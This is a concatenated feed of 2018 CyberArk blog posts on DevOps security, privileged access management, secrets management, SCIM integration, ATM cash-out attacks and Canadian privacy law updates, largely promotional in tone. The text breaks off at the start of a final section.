Developers, IT operations staff and administrators require quick, easy workflow to do their jobs effectively. Therefore, they can’t be constrained by restrictive security policies that impede the velocity of the delivery pipeline. When it comes to working with these teams, Chris explained that security professionals must re-shape perspectives by shifting away from checklists and stop signs and focusing instead on educating tams about the potential negative impacts to the business – response/notification costs, employee productivity loss, lawsuits/settlements regulatory fines, additional security and audit requirements and brand recovery costs. When and how they convey this information to development teams is equally important. Once security teams can communicate these ramifications within the context of the business, they can begin a more effective dialogue about embedding security knowledge and best practices into the software development process.

How Security Teams Can Work within DevOps

Chris shared a number of best practices for putting security right in the middle of the DevOps “Venn diagram” of lean product development, continuous delivery and effective culture and organization including:

  • Support product teams through education. One of the ways that development teams aim to gain traction is through integrated product teams, which are not only responsible for developing product features, but also with learning from their release and continuously improving processes. They follow a “You Write It, You Own It” mantra – which means they also own security. Security teams should play an advisory role to these teams, providing guidance and educating them on threats and attack vectors.
  • Be part of product planning and design. During this initial phase, security teams should be heavily involved, asking questions and preemptively thinking through potential issues. Instead of prescribing fixes, they should advocate for proactive defense measures. This helps to ensure developers incorporate strong security into the whole product from the beginning – rather than bolting it on at the end.
  • Advise development for best practices regarding static code analysis. Security teams should also play a role in creating security checklists that development teams can create automation against. For example, if an organization needs to ensure that there are no hard-coded credentials in the software, or that it is following cross-site scripting, the security team should be front and center, offering recommendations on how to introduce scanning tools that can be part of the check-in process.
  • Define best practices for automated open source screening. Similarly, security teams should guide development on best practices for automating open source components, along with license management and patching schedules. By educating the development team on how to incorporate these tools directly into their software development process, it becomes natural for users to choose the right version of a particular piece of open source code – they know the lineage of that code, they know that its been patched and they receive updates automatically when the code needs to be patched.
  • Provide guidance for secure micro-service architectures. Though micro-service architectures help streamline processes and break down code, they also expand the attack surface significantly by introducing APIs and loose linkages between critical components. It’s essential that development and operational communities understand how API gateways can secure traffic flow and how proper network segmentation can isolate critical components, so they can make informed decisions around producing and delivering high-performing and highly secure micro-service architectures.
  • Advise infrastructure and operations (I&O) teams to create secure environments using Infrastructure-as-Code (IaC) that is repeatable and verifiable. It’s security’s job to uncover wasteful processes and advise I&O on areas ripe for automation — then provide counsel on available tools that will allow them to embed security rules right into the infrastructure definition language that gets checked in, version controlled and pushed through an automation engine. It’s also security’s responsibility to advise I&O teams on best practices for creating secure containers at each layer: Container orchestration, container network segmentation, container user access, the host operating system and the container run-time environment
  • Work with development to create secure DevOps platforms. By providing education on what types of best practices development teams should be implementing, what kinds of environments they need to be building and what types of issues they need to look out for, security can help development streamline vendor and product evaluations. And with this guidance and enhanced visibility into applications’ access points and code, development teams can more confidently answer key questions such as, “Are we releasing the code that we intend to release? And, is there anything extra in here that we shouldn’t be releasing?”

Security education is critical in bridging the security-development gap, but remember, education is a two-way street. Security professionals should take the time to learn about DevOps tools and their unique security profiles. For example, some tools require hard-coded credentials with privileged accounts. Instead of simply shutting them down, find temporary solutions via isolation to maintain velocity. Security teams should actively contribute to new DevOps tool-chain research to collaboratively find solutions that can provide both speed and security.

Bottom line: As a security professional, the best way to embed yourself fully in the DevOps process is to take on a trusted service provider role, encouraging teams to engage with you regularly to review designs, tooling and emerging threats. Be a team player, and it won’t be long before your insights are not only recognized but also actively sought out.

Interested in learning more? Explore these insights from Global 1000 CISOs on ways to bring security teams into closer alignment with DevOps to drive collaboration and fast-track efforts.

 

]]>
Puppet’s ‘2018 State of DevOps Report’ Highlights Increasing Importance of Security as DevOps Evolves https://www.cyberark.com/blog/puppets-2018-state-of-devops-report-highlights-increasing-importance-of-security-as-devops-evolves/ Thu, 20 Sep 2018 13:01:22 +0000 https://www.cyberark.com/?p=28923

If you are interested in understanding more about how DevOps evolves inside organizations and how security aligns with the evolution of DevOps maturity, Puppet’s 2018 State of DevOps Report offers some powerful insights. The report draws on survey results over multiple years from some 30,000 technical professionals across the globe, as well as insights from DevOps pioneers, including Gene Kim.

One key finding, for example, notes that automating security policy configurations is mission-critical to reaching the highest levels of DevOps evolution. This means as organizations evolve, security policy becomes part of operations, not just an afterthought when an audit looms. Organizations must break down the boundaries between ops and security teams.

The report extends beyond technology – it also probes culture, process and other factors driving IT performance. While DevOps adoption is increasing at a rapid pace, there are many paths for organizations to take for a successful DevOps journey.  Unfortunately, there are even more that can lead to failure.

Some of the most successful DevOps projects come from the ground up vs. top down from a corporate directive. This potentially presents challenges for security teams with a top-down approach. If DevOps originates broadly across the organization from multiple sources, the security team may only gain visibility after the DevOps initiatives have already become established within the business. While it’s obviously much better for security to be involved early in the process to guide and establish security policies for the DevOps team to execute on, when DevOps initiatives come from the ground up it becomes significantly more difficult.

The State of DevOps report views the three pillars of DevOps as culture, automation and measurement. It also identifies and examines the characteristics of DevOps teams and approaches across five distinct stages of evolution, from Stage 0, “Build the Foundation” to Stage 5, “Provide Self-Service Capabilities.” These phases highlight the increasing role and awareness of security, and how security is becoming more widely considered and incorporated at earlier stages of the DevOps evolution.

As noted earlier, a key highlight of the report is how “Automating security policy configurations is mission-critical to reaching the highest levels of DevOps evolution.” To quote from the report summary:

“Highly evolved organizations are 24 times more likely to always automate security policy configurations compared to the least evolved organizations. As organizations evolve, security policy becomes part of operations, not just an afterthought when an audit looms. This requires first breaking down boundaries between ops and security teams (which are further from production). As we see with all the fundamental practices of DevOps, this practice evolves from resolving immediate pain to a more strategic focus — in this case, from “keep the auditors off my back” to “keep the business and our customers’ data secure.” In other words, teams automate security policy configurations initially for their own benefit, and as their understanding evolves, the automation evolves to benefit the entire organization.”

Security is also increasingly recognized at the earlier stages of DevOps evolution. For example at Stage 2, which focuses on achieving standardization and reducing variability, one of the benefits is to reduce the attack surface and security vulnerabilities. This recognition is positive news. As a result, DevOps teams should become increasingly receptive to the security team getting involved and asking how they can help.

Along with AWS, Cognizant and others, CyberArk is a co-sponsor of the 7th annual State of DevOps Report, presented by Puppet and Splunk.

Interested in learning more?

 

]]>
Ten Steps for Securing Privileged Access https://www.cyberark.com/blog/ten-steps-for-securing-privileged-access/ Tue, 18 Sep 2018 13:48:29 +0000 https://www.cyberark.com/?p=28893

In today’s digital world, privileged accounts, credentials and secrets are everywhere—on-premises, in the cloud, on endpoints and across DevOps environments. Security breaches of sensitive data ranging from customer records to intellectual property frequently involve the use of stolen privileged credentials.

Our recently launched “Privileged Access Security for Dummies” eBook educates organizations on how to tighten privileged access security to reduce risk from attackers and malicious insiders. One particularly popular chapter highlights 10 practical steps for reducing privileged access risk. Here is an at-a-glance look at these recommendations. For full details and tips on prioritizing steps to efficiently drive down risk, download a free copy of the eBook today.

  1. Eliminate irreversible network takeover attacks. Don’t let attackers ruin your network and create long-term damage by gaining access to your domain controllers. Move privileged credentials associated with all tier0 and tier1 assets—such as domain controller accounts—to a centralized and automated system. Implement multi-factor authentication (MFA) to protect it.
  2. Control and secure infrastructure accounts. You must control and secure access to your on-premises and cloud infrastructure accounts—from server admin accounts to database instance accounts—because these are some of the riskiest keys to your IT kingdom. Vault all well-known infrastructure accounts and automatically rotate passwords periodically after every use.
  3. Limit lateral movement. Attackers follow patterns – stealing credentials and moving laterally across the infrastructure to carry out their goals. To limit attackers’ movement, remove local admin rights on IT Windows workstations to stop credential theft.
  4. Protect credentials for third-party applications. Attackers increasingly target third-party vendors such as business services, management consultants, legal counsel, facilities maintenance support, logistics companies and more as their applications and IT systems are often less sophisticated and their security defenses are easier to infiltrate. To minimize risk, it’s important to vault all privileged credentials used by third-party applications and vendors. Be sure credentials are rotated frequently.
  5. Manage *NIX SSH keys. SSH keys are gold to an external attacker or malicious insider, as they can leverage unmanaged SSH keys to log in with root access and take over the *NIX (Linux and Unix systems) technology stack. Get these keys in a vault ASAP. After vaulting, make sure to routinely rotate them based on policy and employ a solution that enables event notifications and automation to lessen the potential impact of human error.
  6. Defend DevOps secrets in the cloud and on-premises. DevOps teams have the “need for speed.” Make sure their tools and coding methods don’t compromise privilege access security. Vault and automatically rotate all public cloud privileged accounts, keys and API keys. Additionally, secure secrets used by CI/CD tools such as Ansible, Jenkins and Docker in a vault, while allowing them to be retrieved on the fly, automatically rotated and managed.
  7. Secure SaaS admins and privileged business users. Cyber criminals steal credentials used by SaaS administrators and privileged business users to get high-level and stealthy access to sensitive systems. To prevent this kind of attack, isolate all access to shared IDs and require MFA. Also monitor and record sessions of SaaS admins and privileged business users.
  8. Invest in periodic Red Team exercises to test defenses. In order to stay a step ahead of advanced cyber maneuvers, it’s critical to adopt an attacker’s mindset. When you hire and operate your own Red Team or hire an outside firm, the drills will be as real as possible. Check out this Q&A with our Head of Red Team Services for tips.
  9. Invest in a tool to periodically measure reduction in privileged security risk. Measurement of risk and maturity is a critical capability. If you aren’t gauging and adjusting for risk and change, you can’t focus and know if you’ve done enough. Measurement tools may be available from your privileged access management solution. There are also solutions in the market available to measure your entire security program against an established framework (such as NIST CSF).
  10. Utilize MFA. Passwords are crackable, findable and sharable. MFA that requires “something you have” and “something you know” exponentially decreases compromise. It’s important to ensure your privileged access management solution heavily leverages MFA to enhance the protection that you’re investing in.

Together, these 10 steps provide a framework to establish essential privileged access security controls to strengthen your security posture. Implementing a program that leverages these steps can you help your organization achieve greater risk reduction in less time and satisfy security and regulatory objectives with fewer internal resources. Read more details in our “Privileged Access Security for Dummies” eBook.

]]>
Securing Enterprise DevOps Environments with CyberArk Conjur: 3 Common Use Cases https://www.cyberark.com/blog/securing-enterprise-devops-environments-with-cyberark-conjur-3-common-use-cases/ Tue, 11 Sep 2018 14:34:10 +0000 https://www.cyberark.com/?p=28780

Enterprises adopt DevOps and CI/CD methodologies to accelerate the pace of innovation, eliminate inefficiencies and reduce costs. While this is a giant step forward for businesses, it often introduces complex authentication, authorization and auditing challenges for security teams. Securing credentials and secrets in dynamic DevOps and cloud-based infrastructure requires solutions that are able to support these highly automated dynamic environments by authenticating and managing machine-based identities. Additionally, IT operations and security want to leverage the security policies they have already established across the enterprise, to consistently enforce access policies and avoid disjointed or stand-alone approaches which hamper the pace of development and create additional risk.

DevOps requires a new, centralized approach to secrets management and access control that removes credentials and secrets (i.e. passwords, SSH keys and API keys) from applications and source code control systems, unifies reporting and administration, eliminates friction and fosters programmability and automation.

CyberArk Conjur Enterprise, part of the CyberArk Privileged Access Security Solution, is an enterprise-proven secrets management solution, tailored specifically to the unique infrastructure requirements of native cloud, containerized applications and DevOps environments. The solution helps organizations to secure and manage secrets used by machines and users throughout the DevOps pipeline. With Conjur Enterprise, developers can easily protect secrets, keys, certificates and authentication data. All can be stored more securely—out of repositories, out of source code and off of developer’s laptops —for powerful protection, control and manageability.

While Conjur can be used to apply security controls and best practices anywhere in cloud automation and the continuous software delivery pipeline, here are three common use cases:

  1. Securing the Continuous Integration and Delivery Pipeline. Many enterprises use automated configuration management tools to enable continuous integration and delivery (CI/CD) practices. However, these solutions are inherently difficult to secure because they comprise of multiple tools, often each with some varying form of secrets management capability. This leads to “security islands” that make it difficult to securely share secrets and institute uniform security policies. Additionally, secrets and credentials used to authenticate exchanges and encrypt transactions can be scattered across multiple tools, physical and virtual machines, as well as coded into playbooks, making them effectively impossible to track and manage. CyberArk Conjur integrates natively with leading automated configuration management tools, helping enterprises centralize and simplify the management of security credentials across the application lifecycle. By centrally managing machine identity and role-based access controls for CI/CD configuration management solutions, IT organizations can streamline operations and improve compliance, while instituting uniform security policies across the pipeline.
  2. Strong Container Authentication. In a given enterprise, a few VMs can easily give way to hundreds or many thousands of containers—each with its own security attributes. Adding to this IT security nightmare, containers are by nature transient—spun up and down to support continuous delivery—making them extremely difficult to track and manage. CyberArk Conjur is specifically architected for containerized environments. The solution leverages the native capabilities of the leading container platforms, including Kunernetes, OpenShift and Pivotal Cloud Foundry with seamless integrations to provide robust authentication and authorization. These native integrations enable IT organizations to centralize and simplify the management of secrets for containers across their cloud and hybrid environments. With Conjur, each container/pod is assigned a unique set of role-based access privileges for fine-grained control. Applications and services running in containers are uniquely authenticated, ensuring secrets are shared securely and only with their intended recipients. Credentials are managed based on policy and central audit trails provide visibility into critical security events.
  3. Secure Application Autoscaling. Leading cloud providers, such as AWS, offer auto-scaling capabilities to support elasticity and pay-as-you-grow economics. Yet the dynamic nature of auto-scaling creates numerous security management challenges for enterprises. CyberArk Conjur integrates with leading public cloud services, helping enterprises centralize, simplify and automate the onboarding of secrets and other credentials in auto-scaling environments. For example, Conjur host authentication capabilities enable the distribution of secrets to new cloud compute instances as they are instantiated. Automated rotators make it easy to periodically or proactively update the access keys. Organizations can also use the free CyberArk DNA tool to scan a cloud service, such as AWS, and automatically discover EC2 instances, IAM users and access keys to identify vulnerabilities and assess risks.

For more information on the capabilities and architecture of this powerful secrets management solution, download our white paper and also try Conjur Open Source. To learn more about effectively accelerating the pace of innovation while enabling DevOps security at scale, explore these six guiding principles.

 

]]>
Lifelong Learning is Beneficial for You and the Cyber Security Industry https://www.cyberark.com/blog/lifelong-learning-is-beneficial-for-you-and-the-cyber-security-industry/ Fri, 31 Aug 2018 13:10:23 +0000 https://www.cyberark.com/?p=26992

As the summer days dwindle, I’m sure many of us have a few common observations. For example, my commute to work has been great this week – clearly everyone wants to squeeze in well-deserved vacation time before Labor Day. The number of automatic email replies pinging my inbox supports this observation. Lastly, my Facebook feed is filled with first day of school pictures. This year, I’m also starting to see pictures parents post as they leave their kids in a college dorm for the first time – yikes!

As I flip through the feed, my mind drifts between nostalgic memories of preparing for the first day of school to the pragmatic realities of living a modern life. We are all still learning and toting around backpacks with laptops that kill our posture.

Consider what some of history’s greatest contributors have observed about learning:

  • “Anyone who stops learning is old, whether at twenty or eighty. Anyone who keeps learning stays young.”
    Henry Ford
  • “Find something you’re passionate about and keep tremendously interested in it.”
    Julia Child
  •  “Intellectual growth should commence at birth and cease only at death.”
    Albert Einstein
  • “Tell me and I forget. Teach me and I remember. Involve me and I learn.”
    Benjamin Franklin
  • “The noblest pleasure is the joy of understanding.”
    Leonardo da Vinci

Though these timeless quotes can be applied to all walks of life, they seem particularly relevant for today’s cyber security professionals. With a career in which the only constant is change, cyber security professionals must continuously find new ways to hone their skills and stay ahead of unrelenting threats to their organization.

According to HBR, “Some characteristics of a successful cyber security professional simply can’t be taught in a classroom: unbridled curiosity, passion for problem solving, strong ethics and an understanding of risks.” Keep this in mind as your colleagues ask questions and seek mentors. Be willing to teach and to learn.

If you believe the memes on social media, then your already know business and other successful leaders allocate at least five hours a week for learning. Reading is fundamental, so they say. Hopefully, you were able to knock off one or two of the books on your reading list this summer. If it’s a quick read you seek, check out our free Privileged Access Security for Dummies eBook—it’s full of actionable tips, technical insight and lessons others have learned.

If you prefer more structured learning, consider taking advantage of virtual or face-to-face training courses.

 For other ways to up your cyber security IQ, check out our full collection of curated resources—from on-demand webinars and videos to infographics and technical white papers. And if it’s a new environment you seek for growth, we are hiring! Visit our careers page, explore open positions and get in touch.

]]>
Say “Oui” to the CyberArk Privileged Access Security Solution Version 10.5 – Danke! https://www.cyberark.com/blog/say-oui-to-the-cyberark-privileged-access-security-solution-version-10-5-danke/ Wed, 29 Aug 2018 13:23:38 +0000 https://www.cyberark.com/?p=26973

With the release of the CyberArk Privileged Access Security Solution Version 10.5, organizations can further simplify and increase the efficiency of privileged access security program operations while maintaining the highest level of security standards. Version 10.5 is centered on CyberArk’s core mission to streamline processes and simplify the overall ease-of-use of our solution, as well as improve security and reduce risk.

Expanding Online Support in New Languages

Learning a new language is hard, and translating industry-specific terms that aren’t common in everyday speak is even harder. That’s why CyberArk has added support for 10 new languages within the new user interface: French, Spanish, Portuguese, German, Russian, Chinese, Korean, Japanese, Polish and Turkish; making it easier for end users to more effectively navigate CyberArk in their own native tongue. The CyberArk solution also enables the use of searchable terms to help users quickly discover and execute what they need by selecting terms such as: security, end-user, administration, developer and installation.

Efficient Workflows

Version 10.5 introduces several new features that facilitate workflows for IT administrators. When creating onboarding rules, administrators can now edit preexisting rules whenever they want to create a new policy. This new capability streamlines the backend onboarding rule processes, saves time and removes friction for vault admins.

Being able to utilize native controls can also be a sticking point, as every administrator likes to do their job without being redirected through alternative tools. Organizations that have enabled CyberArk Privileged Session Manager can now fully automate the deployment of connectors without the need for manual intervention. It’s easy via the integration of your own GUI clients into Privileged Session Manager. This not only shortens deployment time, but also reduces human errors by automating this process.

Detection & Mitigation

It’s not uncommon for some end-users to skirt around security steps in the name of ease; it’s simply human nature. To counteract this, many organizations will block RDP client connections from end-user machines and block the ability to open port 3389 for RDP protocol in the corporate firewall due to security best practices. With Version 10.5, auditors and security teams can now monitor, suspend or terminate privileged sessions through HTML5 gateways; which eliminates the requirement to open an RDP connection from the end-user machine.

In this new version, CyberArk Privileged Threat Analytics has also added the capability to classify vault users, accounts and machines that are allowed to use risky commands and distinguish from those who are forbidden to do so. Not only does this granular configuration allow security teams to reduce the number of false positives, but it also helps administrators to prioritize security events more accurately and efficiently than ever before.

Is Version 10.5 for you?

If you are like so many administrators who want to reduce risk without creating unnecessary barriers for your team, then consider what Version 10.5 could do for you. Existing customers can read the full details in the release notes available in the CyberArk Support Vault. For more information, please visit www.cyberark.com, or request a demonstration here.

]]>
The History, Evolution and Opportunity: System for Cross Identity Management (SCIM) Server Technologies https://www.cyberark.com/blog/the-history-evolution-and-opportunity-system-for-cross-identity-management-scim-server-technologies/ Fri, 24 Aug 2018 16:06:13 +0000 https://www.cyberark.com/?p=26949

The History and Evolution

Development on the System for Cross Identity Management (SCIM) specifications has been an ongoing effort with contributions from industry experts across every aspect of security. Originally, SCIM technology was created to extend identity information associated with entities such as users and group membership across disparate systems, unifying a multi-domain environment. Now, this technology is showing potential to become much more standardized, extending support to access management solutions and other tools that require knowledge about “who” (users and applications)  has access to “what” (credentials for target systems and devices, in the case of Privileged Access Security solutions).

Without a SCIM standard, every solution provider would have its own set of APIs, making it difficult for each of these different systems to share information with each other using a common “language.” Developing the SCIM specifications enables plug-and-play interoperability among vendors to become a natural capability of the systems involved, which also expands the kind of functionality that can be delivered when this data is harmonized across different systems.

Powered by an application-level HTTP-based protocol, leveraging SCIM enables organizations to create, modify, retrieve and discover core identity resources enabling multiple systems to “speak with each other.” Once enabled, these external systems can communicate without knowing exactly what’s going on with the other system – and they shouldn’t have that level of insight for obvious security reasons. This presents a considerable opportunity to seamlessly integrate security solutions, minimizing the need for professional services engagement or having to work with a vendor’s extensions team.

The Movement Towards SCIM Standardization

The SCIM protocol is expanding – providing support to privileged access security as well as cloud-based services and applications. As mentioned earlier, by leveraging this common standard, vendors can easily share and synchronize identity information to many third-party solutions and start interacting with the data on day one. This opportunity is not limited to vendors in the identity business.

Let’s say an organization is trying to scan a new environment to uncover potentially unknown vulnerabilities. Any industry standard scanner would require access to credentials for accounts with highly privileged permissions in order to perform authenticated scans on various target systems. These scanners would need to obtain said credentials at the exact moment in which they are needed to avoid both compliance and security risks. In theory (and in practice really), a vulnerability scanner can securely retrieve these necessary credentials and be treated as a “user” with rights and permissions to gain access to where the credentials are stored.

By leveraging SCIM, all the entitlements (who has access to what, and what kind of permissions) can flow directly back into any Identity and Access Management solution. With this information, Identity Access Certifications (attestations) and compliance controls can be managed, establishing the necessary permissions for privileged access based on the resulting provisioning/de-provisioning actions. Throughout this process the scanner then becomes just another identity under management – and powered by SCIM, we’ve seamlessly unified IAM, Privileged Access Security and vulnerability scanner solutions.

Through this evolutionary process, SCIM server technology and its associated specifications being developed will go beyond the identity space, enabling organizations to govern third-party applications access to credentials and beyond. The opportunity presented here has the potential to create an infinite number of tight integrations across the hundreds of security solutions available today. Additionally, it brings more value to existing security investments and more importantly, mitigates risk against today’s most advanced cyber threats.

The CyberArk and SailPoint integration, for example, leverages SCIM server technology.  The CyberArk SCIM server is a Java application conforming to the SCIM standard. This allows SailPoint to query and modify Privileged Data (such as Users, Groups, Accounts, Safes, and Permissions) through a web services interface (REST API). The SCIM server uses PACLI (to query and update privileged data from the CyberArk Vault) and the AIM Credential Provider (to retrieve account and login information). Learn more about the CyberArk SailPoint integration on the CyberArk Marketplace and in this on-demand webinar.

]]>
The Power of Integrating Privileged Access Security and Identity Governance https://www.cyberark.com/blog/the-power-of-integrating-privileged-access-security-and-identity-governance/ Tue, 21 Aug 2018 14:25:06 +0000 https://www.cyberark.com/?p=26913

Privileged access across the enterprise continues to increase exponentially, and it’s not hard to see why. Interconnectivity, cloud and mobile-first strategies have enabled a distributed enterprise, in which more people work from home, on the go and in different locations. Business users extend outside of the organization to include vendors, contractors and partners – many of whom need privileged access to critical applications and data to perform their required tasks. Every day, countless non-human applications use privileged credentials to connect to sensitive resources across on-premises cloud, and hybrid environments, as well as DevOps processes.

Securing privileged access to an organization’s most sacred assets is critical in today’s modern threat landscape. Knowing “who” and “what” has access is key. Organizations need to certify each and every one of these privileged accounts – as well as verify when these accounts were last certified. Yet when it comes to managing users and their access entitlements, organizations often deploy two separate solutions to manage the identity lifecycle and access policies for privileged and non-privileged users. In fact, in many organizations, security and audit teams rarely talk to one another.

This siloed approach to managing who has access to what does more than leave dangerous security gaps and blind spots, it can result in:

  • Increased dormant and orphaned privileged accounts: These unused accounts expand the attack surface and are typically “hidden” from normal management and audit.
  • Privileged entitlement creep: Without full visibility, individuals’ access rights often grow beyond what they need to do their current jobs.
  • Erroneous provisioning of privileged access: Without proper policies dictating separation of duties, privileged access can be mistakenly granted to people who do not need or should not have it.
  • Loss of productivity: Without automated privileged access provisioning synchronized to lifecycle events, users are often forced to wait to access systems and data needed to do their jobs. This inconsistent governance, provisioning and authorization process can also result in access violations and regulatory action.

Available on the CyberArk Marketplace, the CyberArk Privileged Access Security Solution and SailPoint Identity Governance provide an integrated, policy-driven approach to – and a unified, single pane of glass view for – managing identity and access governance for all non-privileged and privileged users and environments across the enterprise.

By integrating the CyberArk Privileged Access Security Solution with the SailPoint IdentityIQ Privileged Account Management Module, organizations can close many of the security gaps from historic siloed approaches, while reducing risk and eliminating redundant processes related to managing non-privileged and privileged access. With this joint solution, organizations gain:

  • Critical visibility and governance: Improving security by applying consistent controls and fully managing privileged users and application entitlement lifecycles.
  • Reduced risk: Reducing the attack surface and enhancing regulatory compliance by limiting access privileges and consolidating certifications for privileged and non-privileged accounts to ensure users have the right access to the right safes.
  • Simplified and centralized administration: Improving productivity by streamlining delivery of privileged account access, mitigating entitlement creep via regular de-provisioning and synchronizing and enforcing access controls based on unified security policies to reduce errors.

The CyberArk and SailPoint integration leverages the System for Cross-domain Identity Management (SCIM) server technology, which provides an open standard for easy integration with other security and technology partners. The CyberArk SCIM server is a Java application conforming to the SCIM standard. This allows an Identity provider like SailPoint to query and modify Privileged Data (such as Users, Groups, Accounts, Safes, and Permissions) through a web services interface (REST API). The SCIM server uses PACLI (to query and update privileged data from the CyberArk Vault) and the AIM Credential Provider (to retrieve account and login information).

Now is the time to harness the full power of Privileged Access Security and Identity Governance. Learn more about the CyberArk SailPoint integration on the CyberArk Marketplace and in this on-demand webinar.

 

]]>
Stop ATM Cash-out Attacks by Securing Privileged Access https://www.cyberark.com/blog/stop-atm-payout-attacks-by-securing-privileged-access/ Thu, 16 Aug 2018 12:21:25 +0000 https://www.cyberark.com/?p=26857

According to security reporter Brian Krebs, the FBI issued a confidential alert to banks on Friday, warning that “cyber criminals are planning to conduct a global Automated Teller Machine (ATM) cash-out scheme…commonly referred to as an unlimited operation.” The FBI further stated that “unlimited operations compromise a financial institution or payment card processor with malware to access bank customer card information and exploit network access, enabling large scale theft of funds from ATMs.”

ATM attacks are not new. The famous Barnaby Jack demonstrated how he could make ATMs spit out cash on the stage of Black Hat in 2010. But this required physical access to unpatched machines.

The ‘unlimited operation’ ATM attack is much different and more devastating. Criminals infiltrate a bank’s infrastructure to steal and clone bank cards, remove fraud controls and withdrawal limits, and then coordinate large-scale withdrawals from physical ATMs to steal huge amounts of cash.

While it sounds like a bank robbery created in a Sci-Fi novel, this approach isn’t new either. Just ask Roman Seleznev, a hacker arrested recently for coordinating a similar attack on RBS Worldpay, a payment processor in Atlanta, back in 2008. The DOJ report stated at the time that the attack was “then the most sophisticated and organized computer fraud attack ever conducted.”

Despite the RBS Attacks resulting in $9 million dollars stolen from 2,100 ATMs worldwide in less than 12 hours, the industry is still prone to such massive, coordinated attacks. These attacks are possible for the same reason cyber attackers were able to steal $81 Million from the Bangladesh Bank in 2016 – a failure to properly secure IT infrastructure, specifically around privileged access.

In both the RBS ATM attacks in 2008 and the SWIFT attacks in 2016, attackers used simple means such as phishing to gain a foothold on an employee device, elevated privileges and moved laterally into the network. Once on the network with this level of privileged access, attackers can study the security infrastructure and avoid controls, unencrypt data and prepare for their coordinated assault on ATMs.

Once attackers are on the network with elevated privileges, an attack on ATMs is a ‘path of least resistance.’ They can steal as much money as possible in a short time without sounding the alarms, since at this point, attackers literally “own” the organization.

Now, the FBI urges banks to review how they handle security, specifically around “implementing strong password requirements and two-factor authentication using a physical or digital token when possible for local administrators…”

A better way to phrase this is:  Lock down your privileged access!

But for those banks that have not learned the lessons taught over the past 10 years, here are a few essential principles of protection used by smart organizations:

  • Patch Now, Patch Always: Whether it’s ATMs, financial systems, IT infrastructure or endpoints, attackers seek out active vulnerabilities as an open invitation into your network. It’s one thing to fall victim to an advanced phishing attack that is highly sophisticated. It’s another to leave a proverbial backdoor open into the vault.
  • Contain Attack by Securing Privileged Access: The ATM attackers actively seek out endpoints with local admin rights – removing admin rights prevents attackers from moving into the network and installing malware. But privileged access security doesn’t stop there – domain admin credentials, privileged SSH keys and any other credentials that provide access to sensitive accounts or systems need to be locked down and controlled. By centrally securing privileged credentials, controlling access based on role, and enforcing multi-factor authentication before granting access, the attackers cannot move through the environment to remove security controls and execute their attacks.
  • Continuous Monitoring: Almost all bank attacks start with attackers targeting their networks. By closely monitoring networks based on events or patterns, organizations can determine if an attacker manages to hijack credentials and gain access to target assets – such as ATMs. Organizations must be able to quickly detect and address the malicious behavior.

Cyber criminals will continue to innovate and change tactics to reach their end goal – but only if organizations force them to do so by blocking the known pathways. In this case, crime pays, at least until banks get better at privileged access security.

]]>
Privileged Access Security for Dummies: A Practical, How-To Guide https://www.cyberark.com/blog/privileged-access-security-for-dummies-a-practical-how-to-guide/ Tue, 14 Aug 2018 21:51:42 +0000 https://www.cyberark.com/?p=26690

Let’s face it. Protecting an organization from ever-evolving cyber threats is no small feat. Staying ahead of would-be attackers is a job that requires constant vigilance, innovation, collaboration and continual learning.

Savvy security practitioners understand that one of the most important, preventative steps they can take to bolster their cyber security posture is to secure privileged access – including privileged accounts, credentials and secrets. Protecting privilege is a process, and it’s often a key element of an enterprise-wide security program. Perhaps you are wondering if there a guide with actionable – yet easy-to-understand – information about establishing and maintaining a privileged access security program that you could flip open and reference.

Look no further than the new Privileged Access Security for Dummies guide. Brought to you by CyberArk, this guide is meant for an extended team to read – from CISOs to Developers – and not just IT security. Often, cyber security books go into significant technical depth, which is great for highly technical audiences. You should expect this guide to be conversational, with plenty of examples, analogies and elements designed to make this important security topic more approachable. With this quick and easy guide, readers can better understand and articulate the need to prioritize risk reduction associated with privileged-related access.

Inside, you’ll meet a full cast of characters – from Billy the “freelance hacker” who has made a career out of phishing unsuspecting corporate victims, to “Liam the Leak,” an engineer with access to sensitive data, who’s been passed over for a promotion one too many times. Through their stories, you’ll gain tips, technical insights and lessons others have learned – sometimes painfully so.

Download Privileged Access Security for Dummies today to:

  • Discover the many types of privileged access used by humans and non-human automated processes
  • Learn more about data loss, compliance, audit and third-party risks
  • Get tips for establishing a privileged access security program
  • Explore a 10-step approach for securing privileged access across the enterprise

Get smart on privileged access security. Download the free guide today.

 

]]>
Critical Updates to the Canadian Digital Privacy Act (PIPEDA) https://www.cyberark.com/blog/critical-updates-to-the-canadian-digital-privacy-act-pipeda/ Thu, 09 Aug 2018 14:37:06 +0000 https://www.cyberark.com/?p=26608

If you work for a Canadian business in the private sector, put down that Timmy Hortons and read this blog. The Government of Canada has a number of amendments to the Digital Privacy Act, which received Royal Assent in 2015. The changes, which officially go into effect November 1, 2018, affect multiple sections within the statute.

The scope of the changes are considerable and wide ranging, extending across many different areas including valid consent from individuals (when involving personal information), public interest disclosures, new provisions to business transactions and much more. The biggest, and arguably most important, change appears to be applied to the ‘breach reporting, notification and record keeping’ section.

Businesses now have an obligation to notify consumers – as well as third parties and other necessary business partners – with utmost haste upon becoming aware of a data breach that involves personal information. Failure to do so can result in monetary penalties, negative implications to stock price, distrust from existing customers and impact to future performance and profitability for the business. The original statute states:

“Breach of security safeguards” means the loss of, unauthorized access to or unauthorized disclosure of personal information resulting from a breach of an organization’s security safeguards that are referred to in clause 4.7 of Schedule 1 or from a failure to establish those safeguards.”

There is an omnipresent weakness in the arena of “authorization controls” as described in the Mandiant M-Trends 2018 report. Often, these controls are not hardened to thwart off advanced attackers. Organizations are also not doing enough to both secure privileged credentials and enforce multi-factor authentication (MFA). That same report warns, “If you’ve been breached, our statistics show that you are much more likely to be attacked and suffer another breach. If you have not taken steps to enhance your security posture, you are taking a significant risk.” There’s an industry mantra that goes something like this: “There are only two types of companies: those that have been breached and those that will be breached.”

Before You Call the Royal Canadian Mounted Police, Call CyberArk

Before widespread panic ensues, fear not. The CyberArk Privileged Access Security Solution can help your organization mitigate risk from a data breach that originates either from the inside or externally through a variety of advanced techniques. The core of our solution provides advanced monitoring and alerting to aid in the notification of affected individuals and relevant third parties involving “breaches of security safeguards” that pose a “real risk of significant harm” to affected individuals.

Another major element of the statute is the requirement to keep a record of all breaches involving personal information and provide a copy to the Office of the Privacy Commissioner of Canada upon request. CyberArk provides comprehensive and integrated reports on privileged accounts and privileged session activities. The log files are stored in a tamper proof vault to prevent unauthorized access, modification or deletion of the files. This capability reduces time spent conducting an audit and both simplifies and streamlines the process in reporting back to regulators.

Nobody Likes Bad Hygiene, Especially in Security  

